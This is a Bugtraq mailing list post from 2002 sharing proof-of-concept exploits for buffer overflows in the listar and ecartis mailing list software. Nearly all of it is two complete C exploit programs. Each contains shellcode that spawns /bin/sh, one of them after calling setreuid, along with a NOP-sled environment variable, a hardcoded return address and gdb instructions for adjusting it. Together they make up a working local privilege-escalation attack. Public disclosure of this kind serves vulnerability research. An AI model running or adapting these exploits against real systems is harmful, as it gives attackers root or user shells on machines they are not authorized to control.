Bugtraq mailing list archives
ecartis / listar PoC
From: KF <dotslash () snosoft com>
Date: Wed, 24 Apr 2002 18:56:01 -0700
Heres some code for this post a while back ... http://online.securityfocus.com/archive/82/258763 This is NOT the same issue in the my_strings.c there are MULTIPLE issues in ecartis still and the same goes for listar...
This issue is a strcpy from argv to a fixed buffer .... nothing special.ecartis and listar are one in the same... depending on how you install either one it could be a root exploit or it could be a non priv account exploit. I have seen alot of listar installs suid root...
-KF
/* * /home/listar-0.129a/listar * * The vulnerability was found by KF / Snosoft (http://www.snosoft.com) * Exploit coded up by The Itch / Promisc (http://www.promisc.org) * * This exploit was developed on the Snosoft vulnerability research machines * * - The Itch * - itchie () promisc org * * - Technical details concerning the exploit - * * 1) Buffer overflow occurs after writing 990 bytes into the buffer at the command line * (990 to overwrite ebp, 996 to overwrite eip). * 2) The code string with the return address will be unaligned. * */ #include <stdio.h> #include <stdlib.h> #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 #define DEFAULT_BUFFER_SIZE 1000 char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char *buff; char *egg; char *ptr; long *addr_ptr; long addr; int bsize = DEFAULT_BUFFER_SIZE; int eggsize = DEFAULT_EGG_SIZE; int i; int get_sp = 0xbffff4e0; if(argc > 1) { bsize = atoi(argv[1]); } if(!(buff = malloc(bsize))) { printf("unable to allocate memory for %d bytes\n", bsize); exit(1); } if(!(egg = malloc(eggsize))) { printf("unable to allocate memory for %d bytes\n", eggsize); exit(1); } printf("/home/listar-0.129a/listar\n"); printf("Vulnerability found by KF / http://www.snosoft.com\n";); printf("Coded by The Itch / http://www.promisc.org\n\n";); printf("Using return address: 0x%x\n", get_sp); printf("Using buffersize : %d\n", bsize); /* alignment */ ptr = buff + 2; addr_ptr = (long *) ptr; for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; } ptr = egg; for(i = 0; i < eggsize - strlen(shellcode) -1; i++) { *(ptr++) = NOP; } for(i = 0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } egg[eggsize - 1] = '\0'; buff[bsize -1] = '\0'; memcpy(buff, "RET=", 4); memcpy(egg, "EGG=", 4); putenv(buff); putenv(egg); system("/home/listar-0.129a/listar $RET"); return 0; }
/* * /home/ecartis/ecartis * * The vulnerability was found by KF / Snosoft (http://www.snosoft.com) * Exploit coded up by The Itch / Promisc (http://www.promisc.org) * Shellcode created by r0z / Promisc (r0z () promisc org) * * This exploit was developed on the Snosoft vulnerability research machines * * - The Itch * - itchie () promisc org * * - Technical details concerning the exploit - * * 1) Buffer overflow occurs after writing 996 bytes into the buffer at the command line * (996 to overwrite ebp, 1000 to overwrite eip). * 2) The code string with the return address will be unaligned. * 3) Shellcode will try to do a setreuid(508); * * I had trouble reaching my own buffer in the enviroment dynamicly, so i gdb'ed it. * If the exploit fails, comment the system() that runs ecarthis, uncomment the other system() * The run this exploit, you will be in bash then, do: gdb /home/ecartis/ecartis * in gdb, type: run $RET * The program will probably then segfault, then type: x/200x $esp and press enter a couply of times * until you see alot of 0x90909090. Then pick on of those address and replace it with the * int get_sp = 0xbffff550. Change the system() commands below back as how they were and rerun the exploit. * */ #include <stdio.h> #include <stdlib.h> #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 #define DEFAULT_BUFFER_SIZE 1000 /* setreuid(508); execve("/bin/sh", "sh", 0); (c) r0z () promisc org */ char shellcode[] = "\x31\xdb" /* xor %ebx, %ebx */ "\x31\xc9" /* xor %ecx, %ecx */ "\xf7\xe3" /* mul %ebx */ "\xb0\x46" /* mov $0x46, %al */ "\x66\xbb\xfc\x01" /* mov $0x1fc, %bx */ "\x49" /* dec %ecx */ "\xcd\x80" /* int $0x80 */ "\x31\xd2" /* xor %edx, %edx */ "\x52" /* push %edx */ "\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */ "\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */ "\x89\xe3" /* mov %esp, %ebx */ "\x52" /* push %edx */ "\x53" /* push %ebx */ "\x89\xe1" /* mov %esp, %ecx */ "\x6a\x0b" /* pushl $0xb */ "\x58" /* pop %eax */ "\xcd\x80"; /* int $0x80 */ int main(int argc, char *argv[]) { char *buff; char *egg; char *ptr; long *addr_ptr; long addr; int bsize = DEFAULT_BUFFER_SIZE; int eggsize = DEFAULT_EGG_SIZE; int i; int get_sp = 0xbffff550; if(argc > 1) { bsize = atoi(argv[1]); } if(!(buff = malloc(bsize))) { printf("unable to allocate memory for %d bytes\n", bsize); exit(1); } if(!(egg = malloc(eggsize))) { printf("unable to allocate memory for %d bytes\n", eggsize); exit(1); } printf("/home/ecartis/ecartis\n"); printf("Vulnerability found by KF / http://www.snosoft.com\n";); printf("Coded by The Itch / http://www.promisc.org\n\n";); printf("Using return address: 0x%x\n", get_sp); printf("Using buffersize : %d\n", bsize); /* alignment */ ptr = buff + 2; addr_ptr = (long *) ptr; for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; } ptr = egg; for(i = 0; i < eggsize - strlen(shellcode) -1; i++) { *(ptr++) = NOP; } for(i = 0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } egg[eggsize - 1] = '\0'; memcpy(egg, "EGG=", 4); putenv(egg); buff[bsize - 1] = '\0'; memcpy(buff, "RET=", 4); putenv(buff); system("/home/ecartis/ecartis $RET"); // system("/bin/bash"); return 0; }
Current thread:
- ecartis / listar PoC KF (Apr 25)
- Re: ecartis / listar PoC John Madden (Apr 26)
- Re: ecartis / listar PoC KF (Apr 26)
- Re: ecartis / listar PoC John Madden (Apr 26)